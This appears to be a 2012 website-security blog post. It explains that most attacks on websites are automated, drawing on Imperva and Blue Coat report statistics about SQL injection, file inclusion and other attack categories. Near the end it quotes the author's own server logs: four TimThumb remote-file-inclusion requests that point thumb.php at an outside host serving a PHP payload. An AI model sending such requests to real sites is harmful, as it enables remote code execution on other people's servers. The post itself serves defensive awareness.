When trying to undertand the anatomy of attacks on websites you have to break it down into manageable parts. In my mind it really comes down to two types: Targeted and Opportunistic.
More important to understand is how the attack is executed, and that’s what I want to spend some time on in this post.
What do today’s attacks look like?
For most, targeted attacks will be rare, but they do happen every day. You might recall mentions on the news about the CIA website being defaced, or LinkedIn and eHarmony being compromised, in both those instances, I’d categorize those as targeted attacks. There are also examples like the most recent article that talked to the Gizmodo employee who appeared to have lost his entire digital identify, simply because the attacker liked his Twitter handle.
On the flip side, you have opportunistic attacks that are likely what most reading this get affected by. I provide a better discussion on it on our post, Understanding Opportunistic Attacks. The good news though is that in both instances you find many similarities in the attacks, specifically the use of tools that allow for automation.
Setting the Foundation
To help understand automation we’ll make use of a report that was released in July by Imperva. It’s titled Web Application Report, Edition 3 – Released July 2012, and in it they summarize their findings after a 6 month period in which they randomly selected 50 websites and actively monitored their attacks. Highlights of what they found include:
- Expect attack incidents 120 days per year (33%) of the time, some can experienced 292 days (80%)
- Attacked 274 times per year
- Attack campaigns averages 7 minutes 42 seconds, can range upward from there
- SQL Injection is the most frequent attack
While a sample group of 50 websites is relatively small and likely not very representative of the close to 800,000,000 websites on the interwebs today, it is useful in understanding what I mean when I say automation and more importantly, seeing what some of those attacks look for.
When reading their report it’s important to get your baseline as to how their data analysis was conducted and better understand their presentation methodology.
So to help summarize:
- Their study did not place focus on the number of malicious requests, instead it placed emphasis on something they call an attack incident.
- That attack incident in turn can be comprised of multiple malicious requests, this is important to understand.
- The definition of an attack incident was set as an event in which a minimum of 30 requests were made in a 5 minute period (averages out to 1 attack every 10 seconds).
- They then introduced the concept of a battle days where at a minimum, one attack incident occurred.
With this understanding we are better prepared to digest the data.
Their summary chart is a good place to start when digesting the report:
Here you can see some very good quantifiable data points that allow you to better understand what automation really means, more importantly what it looks like.
- In a 6 month period, the median battle days was 59, while the worst case scenario had it at 141. Reminder that the median is not to be confused with average, its the middle value that separates the top half from the bottom half. In other words, 50% of the sites had more than 59 battle days, while the other 50% had less than 59 battle days. The 141 means that at a minimum, one site had 141 battle days.
- In the same group, they had a median of 137 attack incidents with a worst-case of 1,383. This does not correlate the 1,383 attack incidents with the 141 battle days. What it does tell us that at a minimum those incidents, 137 and 1,383, both each contain at least 30 requests within a 5 minute period – conservatively. So in the case of the 137 attack incidents you’re looking at 4,110 requests and in the case of 1,383, you’re looking at 41,490 requests. While grossly underestimated, it’s good to paint a more complete picture in terms of what the websites experienced over a 6 month period.
- The last thing to pay mind to iis the duration of each attack incident. In the chart, we see that the median is set at 7.70 minutes while in the worst case scenario they found it to be about 79 minutes. What I can say about this is that in our own experience we have seen attacks take as long as 4 days, which translates roughly to 5,760 minutes
I found this all very fascinating. For me, it gave me a much better of what automation looks like. Specifically how it is employed in today’s attacks.
The shear volume of the attacks in the incident, and attack days makes it highly impractical to think it is anything but an automated process. With that assumption, taking a look at what the attacks were comprised of was another great addition to the report.
In their analysis they summarized the attacks into 8 categories, here I’ll focus on 5, the ones I think impact our readers the most.
- SQL Injection (SQLi)
- Remote File Inclusion (RFI)
- Local File Inclusion (LFI)
- Directory Traversal (DT)
- Cross-Site Scripting (XSS)
From that, this was the distribution of those groups in attack incidents within the sample group:
In each case, here is the summarized duration of those same attacks within the sample group:
Again, this does not mean that this is the same distribution you can come to expect, instead it’s meant to better illustrate what automated attacks look like and how they target different vulnerabilities.
The first table shows that within the 6 month test period, and restricted to their sample group, the median attack incident was 17.50 for SQL injection attacks, again meaning that 50% of the incidents were above this and 50% below it.
This doesn’t mean that they were successful, just that the attempt was recorded. In that same sample group, the max attack incidents was recorded at 320 for that same category – SQL injection.
The second table then shows you that of all the incidents, the median was 8.39 minutes for SQLi, 7.50 minutes for RFI, 7.83 minutes for LFI, and so on.
The Key is Automation
If you find yourself scratching your head above, I do apologize and hope to clarify the discussion in this section.
What the data above provides is insight that helps affirm opinions around how attacks work, specifically the automation of attacks. Because of the sheer volume of attacks today, automation is the only real answer to help explain the surge in infections over the past two years.
Automation is key because it offers a number of benefits to the attackers, for instance:
- Allows for mass exposure – reach more sites quickly, versus individually
- Reduces the overhead of following more traditional steps – Reconnaissance, Information Gathering, Strategy, Execution
- Provides tools to the inexperienced
- Increases odds of success, allows for a high-rate of communication between the host and the attacker, in some instances capable of taking down a server or quickly ascertaining a vulnerability before a system is able to respond
That being said, automated attacks still carry with them similarities, they:
- Scan for potential victims
- Comprise the victim using tool
- Keep control of the environment
In some instances however you can expect the scanning and compromise to happen simultaneously, as what you see above. In those instances those attacks were automated scans looking to exploit known vulnerabilities in each of those categories.
Here is a real-world example on my own server in which you can see the attack attempting to (1) identify the vulnerability, TimThumb, and if found (2) exploit it by passing a parameter that then referenced the malicious payload:
X.X.X.X – – “GET /%22%20class=%22resultLink/wp-content/themes/groovyvideo/thumb.php?src=http://picasa…alcode.com/andalas.php HTTP/1.1″ 404
X.X.X.X – – “GET /wp-content/themes/groovyvideo/thumb.php?src=http://picasa.co…onalcode.com/andalas.php HTTP/1.1″ 404
X.X.X.X – – “GET /%22%20class=%22resultLink/wp-content/themes/groovyvideo/thumb.php?src=http://pica…lcode.com/andalas.php HTTP/1.1″ 404
X.X.X.X – – “GET /wp-content/themes/groovyvideo/thumb.php?src=http://picas…ionalcode.com/andalas.php HTTP/1.1″ 404
In these implementations while they automate attacks, they are still managed by an individual or group of individuals. That unfortunately is but one component of these attacks.
More sophisticated automation tools are embedded within worms and housed within malware networks (malnets). This was best articulated in Blue Coat’s 2011 Web Security Report, in which they kick off the report by saying:
…malnets (malware networks) emerged as the next evolution in the threat landscape. These infrastructures last beyond any one attack, allowing cybercriminals to quickly adapt to new vulnerabilities and repeatedly launch malware attacks. By exploiting popular places on the Internet, such as search engines, social networking and email, malnets have become very adept at infecting many users with little added investment.
They go on to provide a nice illustration in which they identify the top 5 malnets for the year and more importantly, provide good information on what each malnet is designed to do and how they scale based on when an attack occurs or when goes into hibernation.
To help grasp the global reach of these malnets they even provide a nice illustration in which they show how each malnet is geographically dispersed:
Yes, all this can be a bit overwhelming, to myself included, but the fact remains that the interwebs is a dangerous place. Attacks today have nothing to do with you as an individual in most cases, and rarely are targeted – using rarely loosely when you think about the 800 million websites – its about maximum impact and monetization, or financial gain.
The question and comments needs to change from, “Why me?” and “It’d never happen to me!” to “How do I become better prepared and informed about today’s threats on the web?”
If you have any questions or comments pertaining to this post you can (1) leave a comment or (2) send us an email at email@example.com.